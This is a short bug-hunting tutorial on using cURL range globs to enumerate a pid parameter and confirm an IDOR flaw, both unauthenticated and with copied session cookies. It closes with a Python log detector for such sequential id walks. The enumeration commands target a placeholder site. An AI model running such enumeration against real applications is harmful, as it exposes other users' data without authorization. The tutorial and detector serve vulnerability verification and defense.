Abstract — The article explains how to use the Linux command cURL to exploit an IDOR vulnerability in both an authenticated and an unauthenticated manner.
Introduction
While searching for a vulnerability or conducting an investigation, getting a quick proof of concept (POC) for your assumption or hypothesis is important. It helps you focus better and reach the desired result faster.
The article is divided into three (3) sections so that advanced users can skip the part that covers the basics.
- What is cURL and how to use cURL on Linux?
- Using cURL to exploit IDOR to verify the bug (unauthenticated).
- Using cURL to exploit IDOR to verify the bug (authenticated).
What is cURL and how to use cURL on Linux?
cURL is a computer software project providing a library and command-line tool for transferring data using various network protocols. The name stands for “Client URL”. (Source — Wikipedia)
cURL is a tool to transfer data from or to a server, using one of the supported protocols (HTTP, HTTPS, FTP, FTPS, SCP, SFTP, TFTP, DICT, TELNET, LDAP or FILE). The command is designed to work without user interaction. (Source — Linux man pages)
Using cURL to exploit IDOR to verify the bug (unauthenticated)
curl 'https://targetwebsite.tld/internalpage?pid=[1-100]' -H 'User-Agent: Mozilla/5.0 (X11; Windows x86_64) Chrome/88.0.4500.0 Iron Safari/537.36' --compressed --insecure -o 'verification#1.log'
Deconstructing the command:
a. The -H flag adds a custom header to the request; it can be repeated for several headers.
b. The request URL contains the string [1-100], a cURL range glob that makes cURL request the page once for every value of pid from 1 to 100. The -o flag value 'verification#1.log' uses #1 to refer to the current value of that first range, so the responses are stored in the current directory as follows:
verification1.log
verification2.log
verification3.log
....
verification100.log
c. User-Agent: the browser user-agent string tells the server and any intermediaries the operating system, browser and other details of the client from which the request originates.
Using cURL to exploit IDOR to verify the bug (authenticated)
To exploit the bug in an authenticated manner, it is suggested to copy the request from the browser with the help of DevTools -> Network tab -> right-click on the request -> Copy as cURL.
To exploit the vulnerability with authentication, it is important to have the session parameters and cookies present in the cURL request.
curl 'https://targetwebsite.tld/internalpage?pid=[1-100]' -H 'User-Agent: Mozilla/5.0 (X11; Windows x86_64) Chrome/88.0.4500.0 Iron Safari/537.36' -H 'Cookie: userid=31337; session_hash=a72832SjpeOlepwlk9c253' --compressed --insecure -o 'verification#1.log'
The rest of the deconstructed request is explained in the earlier section; the only addition to the request is the cookie header:
-H 'Cookie: userid=31337; session_hash=a72832SjpeOlepwlk9c253'
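The defender-side counterpart to both commands above, as an added example that is not part of the original article: detection logic over web-server access logs that flags one client walking sequential pid values on one endpoint, which is exactly the request pattern cURL's [1-100] glob produces. The log lines, client IPs and the gap tolerance are constructed for the example; the endpoint path and User-Agent string are the ones from the article.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Constructed sample lines in combined log format: one client (203.0.113.7) walks
# pid=1..5 on /internalpage (one request is denied with 403); 198.51.100.4 is a normal user.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /internalpage?pid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Windows x86_64) Chrome/88.0.4500.0 Iron Safari/537.36"
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /internalpage?pid=2 HTTP/1.1" 200 5098 "-" "Mozilla/5.0 (X11; Windows x86_64) Chrome/88.0.4500.0 Iron Safari/537.36"
203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "GET /internalpage?pid=3 HTTP/1.1" 403 312 "-" "Mozilla/5.0 (X11; Windows x86_64) Chrome/88.0.4500.0 Iron Safari/537.36"
203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "GET /internalpage?pid=4 HTTP/1.1" 200 5077 "-" "Mozilla/5.0 (X11; Windows x86_64) Chrome/88.0.4500.0 Iron Safari/537.36"
203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "GET /internalpage?pid=5 HTTP/1.1" 200 5133 "-" "Mozilla/5.0 (X11; Windows x86_64) Chrome/88.0.4500.0 Iron Safari/537.36"
198.51.100.4 - - [10/Mar/2024:12:00:03 +0000] "GET /internalpage?pid=42 HTTP/1.1" 200 5011 "-" "Mozilla/5.0 (Macintosh) Safari/605.1"
"""

# Combined-log-format prefix: client IP, ident, user, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def parse_lines(text):
    """Yield (ip, path, query_params, status) for every parseable log line."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m.group("target"))
        yield m.group("ip"), url.path, parse_qs(url.query), int(m.group("status"))

def find_id_walks(text, param="pid", min_ids=3, max_gap=2):
    """Return {(ip, path): sorted ids} for clients that successfully (2xx) fetched at
    least min_ids distinct numeric values of `param` on one path, with no gap larger
    than max_gap between neighbouring ids. Denied (403) requests are left out of the
    id set, so the gap tolerance keeps a walk detectable when the server blocks some ids."""
    seen = defaultdict(set)
    for ip, path, qs, status in parse_lines(text):
        if param in qs and 200 <= status < 300:
            for value in qs[param]:
                if value.isdigit():
                    seen[(ip, path)].add(int(value))
    hits = {}
    for key, ids in seen.items():
        ordered = sorted(ids)
        if len(ordered) >= min_ids and all(b - a <= max_gap for a, b in zip(ordered, ordered[1:])):
            hits[key] = ordered  # this client is enumerating the object id
    return hits

if __name__ == "__main__":
    for (ip, path), ids in find_id_walks(SAMPLE_LOG).items():
        print(f"possible IDOR enumeration from {ip} on {path}: pid {ids[0]}..{ids[-1]} ({len(ids)} hits)")
```

Run over real logs, pair the hit with the application's own authorization logs: a walk that returns 200 for ids the client does not own is the IDOR this article verifies, and the fix is an ownership check on the server, not blocking the User-Agent.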